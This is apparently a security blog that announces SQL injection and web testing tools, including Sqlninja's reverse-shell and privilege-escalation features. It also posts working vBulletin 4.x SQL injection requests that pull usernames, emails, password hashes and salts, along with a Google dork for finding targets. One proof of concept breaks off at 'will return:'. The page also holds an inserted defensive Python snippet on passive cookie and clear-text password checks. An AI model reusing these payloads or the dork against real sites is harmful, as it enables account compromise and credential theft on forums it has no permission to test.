lo0.ro cat /dev/null > stupidity – nobody is safe

16 Jul 2012

IronWASP – Iron Web application Advanced Security testing Platform

IronWASP (Iron Web application Advanced Security testing Platform) is an open source system for web application vulnerability testing. It is designed to be customizable to the extent where users can create their own custom security scanners using it. Though an advanced user with Python/Ruby scripting expertise would be able to make full use of the platform, a lot of the tool’s features are simple enough to be used by absolute beginners.

Learn more about it here | Download from here

Passive Plug-ins

  • Analyzes all traffic going through the tool
  • Can also modify the traffic
  • Identifies vulnerabilities passively

E.g.: passwords sent over clear text, HttpOnly/Secure flag missing on cookies
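As an added illustration (not IronWASP's own plug-in code or API), the two passive findings named above, written as a check that inspects one request/response pair from constructed sample traffic and returns its findings:

```python
from urllib.parse import parse_qs

# Hypothetical passive check: it sees traffic the way a passive plug-in would
# and reports issues without sending anything to the target.

PASSWORD_FIELDS = ("password", "passwd", "pwd")


def check_cookie_flags(headers):
    """Report Set-Cookie headers that lack HttpOnly or Secure.
    headers: list of (name, value) tuples from the response."""
    findings = []
    for name, value in headers:
        if name.lower() != "set-cookie":
            continue
        cookie_name, _, attrs = value.partition(";")
        cookie_name = cookie_name.split("=", 1)[0].strip()
        flags = {a.strip().lower() for a in attrs.split(";")}
        if "httponly" not in flags:
            findings.append(f"cookie {cookie_name!r} missing HttpOnly")
        if "secure" not in flags:
            findings.append(f"cookie {cookie_name!r} missing Secure")
    return findings


def check_cleartext_password(url, body):
    """Flag a form body that carries a password field to a non-HTTPS URL."""
    if url.lower().startswith("https://"):
        return []
    fields = parse_qs(body, keep_blank_values=True)
    hits = [f for f in fields if f.lower() in PASSWORD_FIELDS]
    return [f"field {f!r} sent over clear-text to {url}" for f in hits]


def passive_scan(url, body, headers):
    return check_cleartext_password(url, body) + check_cookie_flags(headers)


# Constructed sample traffic so the check runs stand-alone
SAMPLE_URL = "http://example.test/login"
SAMPLE_BODY = "user=alice&password=s3cret"
SAMPLE_HEADERS = [
    ("Content-Type", "text/html"),
    ("Set-Cookie", "sessionid=abc123; Path=/; HttpOnly"),
    ("Set-Cookie", "prefs=dark; Path=/; Secure; HttpOnly"),
]

if __name__ == "__main__":
    for finding in passive_scan(SAMPLE_URL, SAMPLE_BODY, SAMPLE_HEADERS):
        print(finding)
```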

Active Plug-ins

  • Performs scans against the target to identify vulnerabilities
  • Executed only when the user explicitly calls them
  • Fine-grained scanning support

E.g.: Cross-site Scripting, SQL Injection

IronWASP performs taint analysis for DOM-based XSS: it identifies sources and sinks and traces them through the code. Custom source and sink objects can also be configured.

3 Apr 2012

Enema – tool for SQL injection

Enema is not auto-hacking software. It is a dynamic tool for people who know what to do.
Old database versions (e.g. MySQL 4.x) are not supported; development targets modern versions.

  • Features:
    1. Multi-platform.
    2. User-friendly graphical interface.
    3. Multithreaded.
    4. Dump.
    5. Customise your queries.
    6. Plugins to automate attacks.
  • Supported for today:
    1. POST, GET, Cookies.
    2. MSSQL >= 2000 and MySQL >= 5.0.
  • Injection methods supported for today:
    1. Error-based injection.
    2. Union-based injection (using subquery).
    3. Blind time-based: MSSQL (waitfor), MySQL (sleep).


Download here

2 Dec 2011

Mole – automatic SQL Injection exploitation tool

The Mole is an automatic SQL injection exploitation tool. Given only a vulnerable URL and a valid string that appears on the page, it can detect the injection and exploit it, using either the union technique or a boolean-based blind technique.

Features:

* Support for injections using MySQL, SQL Server, PostgreSQL and Oracle databases.
* Command-line interface; different commands trigger different actions.
* Auto-completion for commands, command arguments, and database, table and column names.
* Support for query filters, in order to bypass certain IPS/IDS rules using generic filters, with the possibility of creating new ones easily.
* Developed in Python 3.

Download the Windows or Linux version.

Tutorial and webpage here.

8 Nov 2011

Sqlninja 0.2.6 available – Download

Sqlninja is a tool targeted at exploiting SQL injection vulnerabilities in web applications that use Microsoft SQL Server as their back end.
Its main goal is to provide remote access to the vulnerable DB server, even in a very hostile environment. It is meant for penetration testers, to help automate the process of taking over a DB server once a SQL injection vulnerability has been discovered.

In order to use sqlninja, the following Perl modules need to be present:

* NetPacket
* Net-Pcap
* Net-DNS
* Net-RawIP
* IO-Socket-SSL

Features

* Fingerprinting of the remote SQL Server (version, user performing the queries, user privileges, xp_cmdshell availability, DB authentication mode)
* Brute-force of the 'sa' password (in 2 flavours: dictionary-based and incremental)
* Privilege escalation to the sysadmin group if the 'sa' password has been found
* Creation of a custom xp_cmdshell if the original one has been removed
* Upload of netcat (or any other executable) using only normal HTTP requests (no FTP/TFTP needed)
* TCP/UDP port scan from the target SQL Server to the attacking machine, in order to find a port that is allowed by the firewall of the target network and use it for a reverse shell
* Direct and reverse bind shell, both TCP and UDP
* ICMP-tunnelled shell, when no TCP/UDP ports are available for a direct/reverse shell but the DB can ping your box
* DNS-tunnelled pseudo-shell, when no TCP/UDP ports are available for a direct/reverse shell, but the DB server can resolve external hostnames (check the documentation for details about how this works)
* Evasion techniques to confuse a few IDS/IPS/WAF
* Integration with Metasploit 3, to obtain graphical access to the remote DB server through a VNC server injection
* Integration with churrasco.exe, to escalate privileges to SYSTEM on w2k3 via token kidnapping
* Support for CVE-2010-0232, to escalate the privileges of sqlservr.exe to SYSTEM

Download here

21 Jul 2011

vBulletin “Search UI” SQL Injection 0-day – part II

vBulletin "Search UI" SQL Injection

PoC:

```http
POST /search.php?do=process HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5&categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*
```

will return:

21 Jul 2011

Vbulletin 4.0.x -> 4.1.3 SQL injection Vulnerability 0-day

So... after the patching done 2 months ago by the vBulletin team, here it is:

Vulnerability:
vBulletin 4.x.x up to 4.1.3 suffers from a SQL injection vulnerability in the "&messagegroupid" parameter, due to improper input validation.

Exploitation:
Post data on: -->search.php?search_type=1
--> Search Single Content Type
Keywords : Valid Group Message
Search Type : Group Messages
Search in Group : Valid Group Id

```http
&messagegroupid[0]=3 ) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE userid=1#
```

Exact request:

```http
query=Cross+Domain+Content+Extraction+attacks&titleonly=0&searchuser=&starteronly=0&searchdate=0&beforeafter=after&sortby=dateline&order=descending&showposts=1&saveprefs=1&dosearch=Search+Now&s=&securitytoken=1311201469-a9ee9dd6adccba0f8758fce3f02b7e0a267eea75&searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5&messagegroupid[0]=3 ) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#
```

Google dork: intitle: powered by Vbulletin 4
Author: FB1H2S
Found his blog. Awesome posts.